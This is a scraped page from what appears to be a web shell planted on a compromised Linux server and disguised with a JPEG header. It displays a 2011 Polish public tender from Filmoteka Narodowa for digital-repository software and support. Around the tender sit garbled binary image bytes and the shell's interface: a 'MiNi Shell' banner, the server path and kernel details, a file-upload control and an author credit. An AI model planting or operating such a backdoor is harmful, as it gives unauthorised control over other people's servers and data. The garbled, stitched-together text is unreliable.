JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111207/415272-N-2011.html

<p class="kh_header"><b>Warszawa: ROZWÓJ SYSTEMU REPOZYTORIUM CYFROWE W ZAKRESIE OPROGRAMOWANIA I WSPARCIE TECHNICZNEGO</b><br>
<b>Numer ogłoszenia: 415272 - 2011; data zamieszczenia: 07.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Filmoteka Narodowa , ul. Puławska 61, 00-975 Warszawa, woj. mazowieckie, tel. 022 8455074, faks 022 540 83 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.fn.org.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROZWÓJ SYSTEMU REPOZYTORIUM CYFROWE W ZAKRESIE OPROGRAMOWANIA I WSPARCIE TECHNICZNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wyrażenia i skróty użyte w specyfikacji istotnych warunków zamówienia oznaczają:

MAM (Media Asset Management ) - system do zarządzania treściami audio-wideo,
MD (ang. Man-day) - Dzień roboczy pojedynczego pracownika,
RC - System Repozytorium Cyfrowe działający w środowisku Zamawiającego, służący do przechowywania długoterminowego materiałów audio-wideo oraz ich opisu archiwistycznego,
Serwis Internetowy RC - Portal Internetowy Repozytorium Cyfrowego działający w środowisku Zamawiającego, służący do udostępniania w Internecie treści audiowizualnych wraz z metadanymi,
SI - System informatyczny Filmoteka gromadzący opisy zbiorów: kopie filmowe, plakaty, książki, czasopisma, fotosy itp. archiwizowane i przechowywane w archiwach Filmoteki Narodowej,
SIWZ - specyfikacja istotnych warunków zamówienia,
Ustawa lub PZP - Ustawa Prawo zamówień publicznych z dnia 29 stycznia 2004 r. wraz z późniejszymi zmianami (Dz.U. z 2010 Nr 113 poz 759, Dz. U. z 2007 r. Nr 223, poz. 1655, z 2008 r. Nr 171, poz. 1058, Nr 220, poz. 1420 i Nr 227, poz. 1505 oraz z 2009 r. Nr 19, poz. 101, Nr 65, poz. 545, Nr 91, poz. 742, Nr 157, poz. 1241, Nr 206, poz. 1591 i Nr 219, poz. 1706, Dz.U. z 2010 Nr 113 poz 759),
Zamawiający - Filmoteka Narodowa, ul. Puławska 61, 00-975 Warszawa, 
Wykonawca - osoba fizyczna, osoba prawna albo jednostka organizacyjna nie posiadająca osobowości prawnej, która ubiega się o udzielenie zamówienia publicznego, złożyła ofertę lub zawarła umowę w sprawie zamówienia publicznego.

Przedmiotem zamówienia jest dostawa oprogramowania stanowiącego rozszerzenie funkcjonalności obecnie używanego oprogramowania System Repozytorium Cyfrowe, usługi informatyczne oraz świadczenie usług wsparcia technicznego na dotychczas zainstalowany System RC oraz Serwis Internetowy RC i jego nowe funkcjonalności.
W związku z realizacją Projektu pt. Rozbudowa Repozytorium Cyfrowego Filmoteki Narodowej oferowane oprogramowanie musi gwarantować najwyższe bezpieczeństwo i jakość przetwarzanego obrazu filmowego zapisanego w formatach profesjonalnych 4K oraz spełniać dalej wymienione parametry.

Przedmiot zamówienia obejmuje:

1)	Dostawę Oprogramowania wraz z licencjami rozszerzającego funkcjonalność systemu RC oraz Serwisu Internetowego RC działającego w środowisku Zamawiającego o dodatkową funkcjonalność:
a.	 obsługę filmów animowanych w systemach: RC oraz Serwisie Internetowym RC zgodnie z projektami funkcjonalnym oraz graficznym przedstawionymi przez Zamawiającego na etapie prac analitycznych,
b.	 obsługę nośników cyfrowych kaset HdCAM, BetacamDigital, BetacamSP i nośników optycznych w systemie RC zgodnie z projektem funkcjonalnym przedstawionym przez Zamawiającego na etapie prac analitycznych,
c.	 Wyszukiwanie federacyjne (wspólne) w bazach: (1) Filmów dokumentalnych oraz (2) Filmów fabularnych dla Serwisu Internetowego RC,
d.	 Wprowadzenie do wyszukiwarki Serwisu Internetowego RC systemu podpowiedzi słów/wyrażeń zindeksowanych w bazie wyszukiwarki.
2)	Instalację Oprogramowania oraz integrację z systemem RC.
3)	Szkolenia z zakresu obsługi i administracji Oprogramowaniem.
4)	Usługi programistyczne w oparciu o rozliczenie typu time & material (30 md) na potrzeby dalszej rozbudowy systemu RC oraz Serwisu Internetowego RC.
5)	Usługi analityczno-projektowe oraz wdrożeniowe na potrzeby integracji systemu RC z systemem SI.
6)	Usługi serwisu oraz wsparcia technicznego dla systemu RC oraz Serwisu Internetowego RC obecnie działającego w środowisku Zamawiającego. Wymagane jest świadczenie usług serwisowych co najmniej do dnia 30.12.2012 r. lub dłużej.

Wymagania szczegółowe:

Ad. 1. Dotyczące dostawy oprogramowania wraz z licencjami:

(1)	Wykonawca udzieli zamawiającemu bezterminowej licencji na użytkowane Oprogramowanie (licencja dodatkowe funkcjonalności wymienione w punktach 1 a - d),
(2)	Wymaga się, aby wdrożone oprogramowanie było objęte minimum 12 miesięczną gwarancją na jego poprawne działanie liczoną od daty odbioru oprogramowania. 

Ad. 2. Wymagania szczegółowe dotyczące instalacji oraz integracji z istniejącym Systemem RC:

(1)	Zainstalowanie, skonfigurowanie oraz uruchomienie dostarczonego oprogramowania.
(2)	Zintegrowanie dostarczonego oprogramowanie z istniejącym systemem RC.
(3)	Instalacja, konfiguracja i uruchomienie oraz wszelkie próby i testy dostarczonego oprogramowania powinno odbywać się wyłącznie w terminach uzgodnionych z Zamawiającym.
(4)	Wykonawca zainstaluje oprogramowanie na serwerze będącym w posiadaniu FN lub jeżeli jego parametry są niewystarczające dostarczy na własny koszt odpowiedni serwer.
Zamawiający dysponuje serwerem IBM x3550 M2, Xenon 4C X5570, 8GB MEM. Działają na nim aktualnie aplikacje: TSM (Tivoli Storage Manager), RC, PostgreSQL.
(5)	Integracja z istniejącym w FN systemem RC nie może zakłócić i zmienić zasad jego działania.
(6)	Integracji z istniejącym systemem RC,
(7)	Wykonawca uzupełni istniejącą dokumentację do systemu RC o informacje dotyczące wdrożonego oprogramowania. Wymaga się przynajmniej uzupełnienia dokumentacji:
a.	Instalacji oprogramowania,
b.	Procedury uruchamiania i wyłączania systemu RC,
c.	Procedury tworzenia kopii zapasowej,
d.	Procedury zmiany haseł,
e.	Podręcznika administratora,
f.	Podręcznika użytkownika.

Ad. 3. Wymagania szczegółowe dotyczące szkoleń.

(1)	Wymaga się przeszkolenia podstawowego dla 4 pracowników FN w Warszawie, we wskazanym przez Zamawiającego, miejscu i na dostarczonym przez Zamawiającego sprzęcie w zakresie obsługi dostarczonego oprogramowania.

(2)	Wymaga się przeszkolenia rozszerzonego dla 2 pracowników FN w Warszawie, we wskazanym przez Zamawiającego, miejscu i na dostarczonym przez Zamawiającego sprzęcie w zakresie administracji dostarczonego oprogramowania.

Ad. 4. Wymagania szczegółowe dotyczące usług programistycznych w oparciu o rozliczenie typu time & material (30 md).

Prace programistyczne na potrzeby dalszej rozbudowy systemu RC oraz Serwisu Internetowego RC będą odbywały się w okresie wsparcia systemu. Zmiany i poprawki systemu RC oraz Serwisu Internetowego RC będą zgłaszane za pomocą elektronicznego systemu służącego do rejestracji oraz śledzenia zgłoszeń serwisowych, estymowane wraz z Zamawiającym pod kątem ich pracochłonności, a ich realizacja rozpocznie się nie później niż w 5 dni roboczych od potwierdzenia przyjęcia do realizacji. 
Wymaga się udostępnienia Zamawiającemu przez Wykonawcę elektronicznego systemu pozwalającego na rejestrowanie oraz śledzenie zgłoszeń serwisowych oraz zgłoszeń prośby o modyfikacje.

Ad. 5. Wymagania szczegółowe dotyczące prac analityczno - projektowych oraz wdrożeniowych.

(1)	Wymaga się wykonania analizy schematu logicznego metadanych bazy SI w oparciu o fizyczną strukturę danych przedstawioną przez Zamawiającego.
(2)	Wymaga się wykonania analizy schematu metadanych systemu RC w oparciu o dokumentację dostarczoną przez Zamawiającego.
(3)	Wymaga się wykonania projektu mapowania metadanych z systemu SI do systemu RC w zakresie nie mniejszym niż:
a.	Mapowanie słowników,
b.	Mapowanie osób,
c.	Mapowanie utworów kinematograficznych,
d.	Mapowanie zarządzania licencjami oraz wypożyczeniami.
(4)	Wymaga się przedstawienia propozycji mechanizmu pozwalającego na automatyczną migrację wybranych zmian w systemie SI do systemu RC.
(5)	Wymaga się wdrożenia co najmniej mapowania słowników. Mapowanie ma wykorzystywać ogólnodostępne technologie integracyjne w postaci silnika Workflow (ang. Workflow Engine)

Ad. 6. Usługi serwisu oraz wsparcia technicznego dla systemu RC oraz Serwisu Internetowego RC obecnie działającego w środowisku Klienta i nowo zainstalowanych licencji powinny obejmować:

(1)	Udostępnienie Zamawiającemu elektronicznego systemu służącego do rejestracji oraz śledzenia zgłoszeń serwisowych.
(2)	Rozwiązywanie zaistniałych problemów technicznych w systemie RC.
(3)	Rozwiązywanie zaistniałych problemów technicznych w obrębie Serwisu Internetowego RC.
(4)	Nieodpłatną aktualizację Oprogramowania (uaktualnienia do najnowszej wersji) w trakcie trwania świadczeń serwisowych.
(5)	Rekonfigurację systemu wynikającą z uaktualnienia programu przez producenta.
(6)	Wymaga się aby dla systemu RC było zapewnione minimum 12 miesięczne wsparcie świadczone na następujących zasadach:
a.	 5 dni w tygodniu (od poniedziałku do piątku) w godzinach 8-16 dla systemu RC,
b.	 5 dni w tygodniu (od poniedziałku do piątku) w godzinach 8-20 dla Serwisu Internetowego RC.
(7)	Poziom wsparcia dla całości systemu obejmuje:
a.	Maksymalny czas reakcji na zgłoszenie serwisowe - 6 godzin,
b.	Rozwiązanie problemu lub wdrożenie procedury zastępczej tzw. obejścia - 48 godzin,
c.	Przywrócenie normalnej pracy po wdrożeniu procedury zastępczej - maksymalnie 14 dni.

Opis obecnej konfiguracji 
Dodatkowe informacje dotyczące architektury i funkcjonalności systemu znajdują się w Załączniku nr 8 do SIWZ.

Na etapie realizacji umowy Zamawiający udostępni Wykonawcy pełną dokumentację tj.:
- Podręcznik administratora,
- Podręcznik użytkownika,
- Dokumentację REST API,
- Opis formatek w języku XML.

Zamówienie powinno zostać zrealizowane zgodnie z następującym harmonogramem:

Dostawa programu wraz z licencją, instalacja, integracja oraz szkolenie do dnia 29.12.2011 r. 

Serwis, wsparcie techniczne i uaktualnienie oprogramowania od momentu zainstalowania oprogramowania co najmniej do dnia 30.12.2012 r.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.21.25.17-6, 72.00.00.00-5, 72.26.00.00-5, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące: 
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; 
b) posiadania wiedzy i doświadczenia; 
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
d) sytuacji ekonomicznej i finansowej. 

2. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń.

Ocena spełnienia wyżej określonych warunków odbędzie się wg formuły: spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.

Dokumenty wymagane przez Zamawiającego będą dostarczone w oryginale lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem.

3. Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz:

a) wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali, a w przypadku świadczeń okresowych lub ciągłych również realizują jeden kontrakt obejmujący dostarczenie, instalację i uruchomienie co najmniej jednego systemu archimum cyfrowego lub MAM (Media Asset Management - systemu do zarządzania treściami audio-wideo) o wartości nie mniejszej niż 80 000 zł brutto,

b)	wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali, a w przypadku świadczeń okresowych lub ciągłych również realizują jeden kontrakt obejmujący wdrożenie lub rozbudowę portalu internetowego opartego o oprogramowanie Drupal,

c)	wykażą, iż dysponują osobą z minimum 3 letnim doświadczeniem w pracy (programowaniu i administrowaniu) z oprogramowaniem typu Media Asset Management tj. systemem do zarządzania treściami audio-wideo.

4. Wykonawca jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, spełnianie warunków udziału w postępowaniu i w tym celu przedkłada dokumenty i oświadczenia wymienione w sekcji III.4.1 Ogłoszenia. Ponadto Wykonawca powinien wykazać brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 PZP - lista dokumentów potwierdzających brak podstaw do wykluczenia z postępowania zawarta została w sekcji III.4.2-III.4.3 Ogłoszenia

5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz:

- wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali, a w przypadku świadczeń okresowych lub ciągłych również realizują jeden kontrakt obejmujący dostarczenie, instalację i uruchomienie co najmniej jednego systemu archimum cyfrowego lub MAM (Media Asset Management - systemu do zarządzania treściami audio-wideo) o wartości nie mniejszej niż 80 000 zł brutto,

- wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali, a w przypadku świadczeń okresowych lub ciągłych również realizują jeden kontrakt obejmujący wdrożenie lub rozbudowę portalu internetowego opartego o oprogramowanie Drupal,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykażą, iż dysponują osobą z minimum 3 letnim doświadczeniem w pracy (programowaniu i administrowaniu) z oprogramowaniem typu Media Asset Management tj. systemem do zarządzania treściami audio-wideo.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Przedłużenie okresu wsparcia technicznego - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z przepisem art. 144 ust. 1 ustawy Prawo zamówień publicznych, wyłącznie na wniosek Zamawiającego, dopuszcza się możliwość dokonania istotnych zmian postanowień umowy oraz załączników do umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy polegających na:
- zmianie wynagrodzenia Wykonawcy określonego w umowie w sprawie zamówienia publicznego z powodu zmiany ustawowej stawki podatku VAT bez konieczności zmiany umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.fn.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Filmoteka Narodowa, ul. Puławska 61, 00-975 Warszawa Sekretariat, pokój 101, I-piętro. Sekretariat Zamawiającego pracuje w dni robocze od poniedziałku do piątku w godzinach 9-16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2011 godzina 10:00, miejsce: Filmoteka Narodowa, ul. Puławska 61, 00-975 Warszawa Sekretariat, pokój 101, I-piętro. Sekretariat Zamawiającego pracuje w dni robocze od poniedziałku do piątku w godzinach 9-16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com